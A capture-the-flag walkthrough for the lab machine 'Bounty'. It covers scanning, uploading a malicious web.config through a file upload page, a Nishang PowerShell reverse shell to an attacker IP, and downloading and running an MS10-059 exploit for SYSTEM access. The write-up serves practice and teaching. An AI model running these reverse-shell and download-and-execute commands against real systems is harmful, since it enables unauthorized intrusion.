Again, we start with nmap -sC -sV -oA ./bounty 10.10.10.93
We have a box with ONLY a web port open. The site is a simple image (Merlin from Disney's Sword in the Stone). Let's Dirbuter it and see what we can find. Shortly after that starts running, it finds a "transfer.aspx" page. Let's check there
It looks like a simple file upload page, and the "uploadedfiles" folder looks to be where they land. After much trial and error, I finally get a web.config file to upload successfully. A little bit of Google-Fu and we find
https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/. Let's see what we can come up with.
Invoke-PowerShell.ps1 came from https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1
and I added Invoke-PowerShellTcp -Reverse -IPAddress YOURIP -Port 9999 to the very end.
Now just set a netcat listener and navigate to the web.config file you just uploaded. Boom! Instant user shell.
For PrivEsc, run systeminfo. Output that to a file (my output is in the CTB). Feed that file to the Windows Exploit Suggester. You will get this output
If you have been following along alphabetically, Arctic also had the MS10-059 vulnerability. From the Powershell window, you can run this to get the exe over to the target
(new-object net.webclient).downloadfile('http://YOURIP/MS10-059.exe', '\users\merlin\appdata\local\temp\ex.exe')
From there, start a nc -lvnp listener on your machine and run the exe
.\ex.exe YOURIP PORT
Now you are NT AUTHORITY\SYSTEM. Use type instead of cat because this is a windows box and there are your flags.